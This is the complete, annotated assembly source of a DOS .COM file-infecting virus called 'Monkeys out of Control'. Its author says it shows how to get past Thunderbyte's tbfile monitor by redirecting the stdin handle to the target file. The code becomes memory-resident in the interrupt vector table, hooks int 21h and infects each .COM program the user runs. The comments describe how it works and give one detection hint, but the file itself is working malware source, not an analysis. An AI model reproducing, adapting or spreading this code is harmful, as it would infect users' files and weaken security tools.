; Monkeys out of Control, a laboratory specimen by Rhincewind [Vlad]
;
; The purpose of this virus is to show that Thunderbyte's tbfile will
; allow writes to file handles that are normally character-based
; 'system' handles, set to CON:. Instead of checking whether the handle points
; to a character device, tbfile makes its judgement based on the handle
; number only. Tsss..
;
; To exploit this flaw, all you have to do is open your target file
; for read/write and copy the returned file handle to one of the system
; handles using function 46h.
.model tiny                             ; single-segment .COM layout (cs = ds = es = ss at entry; the rep movsb in start relies on ds = es)
.code
org 100h                                ; .COM entry offset; the PSP occupies 0..0FFh
;-----------------------------------------------------------------------
; start: .COM entry point of the specimen / infected host (stage 1).
; Copies the image start..endvirus onto the stack word by word, transfers
; control into that stack copy and uses bp as the delta register for it.
; The stack copy then restores the host's original bytes at 100h, copies
; the image a second time to 0000:0200h (vectors 80h.. of the interrupt
; vector table) and far-jumps there through a 2-byte stub built on the
; stack. Runs with cs = ds = es (.COM). Interrupts stay disabled from the
; push/ret transfer until pop bp, because the word just below the copy is
; re-read after ret and an interrupt frame would overwrite it.
;-----------------------------------------------------------------------
start:
dec bp                                  ; bp is overwritten by pop bp below before any read; effect unused here
mov si, offset endvirus-2               ; si -> last word of the image
mov cx, (endvirus-start)/2              ; cx = image length in words
std                                     ; lodsw walks downward from the end
pushloop:
lodsw                                   ; ax = next word (last word first) ...
push ax                                 ; ... so the finished copy has 'start' at the lowest address (= sp)
loop pushloop
push sp                                 ; ax = sp = address of 'start' in the stack copy (assumes 286+ push sp semantics)
pop ax
add ax,(stack_entry-start)              ; ax = address of stack_entry in the stack copy
push ax
cli                                     ; protect the word at [sp-2] until the sti below (see header)
ret                                     ; jump into the stack copy
stack_entry:
dec sp                                  ; step back onto the word ret just popped ...
dec sp
pop bp                                  ; ... and reload it: bp = address of stack_entry in the copy (delta base)
sti
no_int1:                                ; label hints at an int 1 (trace) concern; nothing visible references it
cld
mov word ptr [bp+(jmpseg-stack_entry)],cs ; record the host segment in the copy's jmpseg (used by exit in stage 2)
mov si,offset restore-100h              ; the two immediate bytes are re-emitted as restore_offset (org $-2) -- whether 'dw ?' zeroes them in the bare specimen depends on the assembler; TODO confirm
org $-2
restore_offset dw ?                     ; file offset of the saved host head bytes; patched at infection time by int21
mov di, 100h
add si,di                               ; si = restore_offset + 100h = in-memory address of the saved head bytes
mov cx, (endvirus-start)
rep movsb                               ; put the host's original (endvirus-start) bytes back at 100h
push cx                                 ; cx = 0 after rep; this word is read as es below and as the far-jmp segment
lea si, [bp-(stack_entry-start)]        ; si = address of 'start' in the stack copy
mov di, 200h
mov es, word ptr [si-2]                 ; es = the 0 just pushed -> destination 0000:0200h (IVT, vector 80h onward)
mov cx, (endvirus-start)
rep movsb                               ; second copy of the image, into the IVT
mov ds,cx                               ; ds = 0
mov ax, offset seg0_entry+100h          ; label X of the image sits at 0000:(X+100h) after that copy
push ax
mov ax,0eaf9h                           ; bytes F9 EA = stc ; jmp far ...
push ax
jmp sp                                  ; executes stc ; jmp far 0000:(seg0_entry+100h) (segment word = the pushed cx = 0)
db 'Monkeys out of Control'
;-----------------------------------------------------------------------
; seg0_entry: stage 2, executing from the copy at 0000:0200h with
; cs = ds = es = 0 and CF set by the stc in the stack stub.
; Hooks int 21h (vector at 0000:0084h) unless the current handler segment
; already has a low byte of 20h, then returns to the host at jmpseg:100h
; with general registers cleared and sp reset.
; Detection hint: the resident state is visible as the int 21h vector
; pointing into segment 0020h and code living in the IVT at 0000:0200h.
;-----------------------------------------------------------------------
seg0_entry:
jc dont_hang                            ; CF must still be set by the stc in the jmp sp stub
jmp $                                   ; otherwise spin forever (presumably an anti-trace/emulation check)
dont_hang:
mov di, 84h                             ; 21h*4: int 21h vector
les bx, dword ptr es:[di]               ; es:bx = current int 21h handler
cmp byte ptr ds:[di+2],20h              ; residency check: low byte of handler segment == 20h (the value installed below) ...
jz exit                                 ; ... -> already resident, just run the host
mov word ptr ds:[di+(int21offset+100h-84h)],bx ; save old handler at 0000:(int21offset+100h), just past the copied image
mov word ptr ds:[di+(int21seg+100h-84h)],es
mov word ptr ds:[di+2],20h              ; new vector = 0020h:(int21-100h), i.e. the int21 label of the IVT copy
mov word ptr ds:[di], offset int21-100h
exit:
mov ax, [jmpseg+100h]                   ; ds = 0: host segment stored in the copy by stage 1
mov ds,ax
mov es,ax
mov sp,0fffch
xor ax,ax                               ; scrub registers before handing over to the host
xor bx,bx
cwd                                     ; dx = 0
xor bp,bp
xor si,si
xor di,di
db 0eah                                 ; jmp far jmpseg:jmpoffset
jmpoffset dw 100h
jmpseg dw 0                             ; patched with cs by stage 1
;-----------------------------------------------------------------------
; int21: resident int 21h filter, reached via vector 0020h:(int21-100h).
; Only ax = 4B00h (EXEC) is intercepted; everything else chains to the
; handler saved at cs:int21offset-100h. On EXEC it infects the program
; named by the caller's ds:dx: allocates a buffer, opens the file for
; read/write, forces handle 0 (stdin) to refer to that file (function
; 46h) and does all further reads/writes through handle 0 -- the tbfile
; handle-number check described in the file header. Files whose first
; byte is 'M' (MZ executables) are skipped; file date/time is preserved.
; Resulting .COM layout: virus image at offset 0, the original first
; (endvirus-start) bytes appended at the old end of file, whose offset is
; patched into restore_offset.
; Stack discipline: [alloc seg][stdin dup] stay pushed until file_abort /
; free_mem_abort pop them; each abort label falls through to the next.
;-----------------------------------------------------------------------
int21:
cmp ax, 4b00h                           ; intercept EXEC (load and execute) only
jnz jmporg21
push ax
push bx
push cx
push dx
push ds
push es
mov ah, 48h                             ; allocate enough paragraphs for one image-length buffer
mov bx, (((endvirus-start)+15)/16)
int 21h
jc abort_before_mem
push ax                                 ; allocated segment, pushed twice:
push ax                                 ;   one for pop ds below, one for pop es at free_mem_abort
mov ax,3d02h                            ; open ds:dx (the EXEC target path, caller's ds:dx still intact) read/write
int 21h
xchg ax,dx                              ; dx = file handle
pop ds                                  ; ds = buffer segment (pop leaves CF intact)
jc free_mem_abort
mov ah, 45h                             ; ax = duplicate of handle 0 (stdin), kept so stdin can be restored
xor bx,bx
int 21h
push ax                                 ; [stdin dup]
mov ah, 46h                             ; force handle 0 (cx) to be a copy of the file handle (bx = dx)
mov bx,dx
xor cx,cx
int 21h
push ax                                 ; ax as left by function 46h; reloaded into bx below
mov ah, 3eh                             ; close the original file handle; the file stays open via handle 0
int 21h
pop bx                                  ; bx = value 46h left in ax; the [bx] test and 'mov cx,bx' below only make sense if this is 0 (handle 0) -- not documented DOS behaviour, TODO confirm
mov ah, 3fh                             ; read (endvirus-start) bytes from handle bx into ds:0
call cx_len_dx_zero
cmp byte ptr ds:[bx],'M'                ; first byte 'M' -> MZ executable, leave it alone
jz file_abort
mov ax, 4202h                           ; seek to end (cx:dx = 0): ax = file length, low word
mov cx,bx
int 21h
mov cs:restore_offset-100h,ax           ; record where the head bytes will be appended (cs = 0020h, so offsets are image-relative)
mov ax, 5700h                           ; get file date/time into cx:dx; saved across the writes
push ax
int 21h
push cx
push dx
call write                              ; append the original head bytes (buffer ds:0) at the end of the file
mov ax, 4200h                           ; seek to start (cx = 0, dx = 0 left by the cwd in write)
mov cx,bx
int 21h
push cs
pop ds                                  ; ds = 0020h: the resident image itself is the source
call write                              ; overwrite the head of the file with the image
pop dx
pop cx
pop ax
inc ax                                  ; 5701h: restore date/time
int 21h
file_abort:
mov ah, 46h                             ; point handle 0 back at the saved stdin duplicate
pop bx
xor cx,cx
int 21h
mov ah,3eh                              ; close the duplicate
int 21h
free_mem_abort:
pop es                                  ; buffer segment
mov ah, 49h
int 21h
abort_before_mem:
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmporg21:
jmp dword ptr cs:int21offset-100h       ; chain to the handler saved by seg0_entry
;-----------------------------------------------------------------------
; write / cx_len_dx_zero: shared tail for the DOS read/write calls.
;   write:          ah = 40h (write), then falls through
;   cx_len_dx_zero: caller has set ah (3fh or 40h); dx = 0 via cwd,
;                   cx = (endvirus-start), issue int 21h, return.
; Handle in bx; buffer at ds:0. Clobbers cx, dx, flags; ax = DOS result.
;-----------------------------------------------------------------------
write:
mov ah,40h
cx_len_dx_zero:
cwd                                     ; ah is 3fh/40h here, so ax >= 0 and dx becomes 0 (buffer offset 0)
mov cx, (endvirus-start)                ; transfer length = size of the image
int21_ret:
int 21h
ret
align word
endvirus:                               ; end of the image that is copied and written ((endvirus-start) bytes)
restore:                                ; in an infected file the host's original head bytes start here (offset = restore_offset)
int21offset dw 20cdh                    ; filled with the old int 21h offset by seg0_entry; initial bytes CD 20 = int 20h,
; presumably so the bare specimen, whose restore copy would start here, lands on an int 20h and terminates
int21seg dw ?                           ; filled with the old int 21h segment by seg0_entry
end start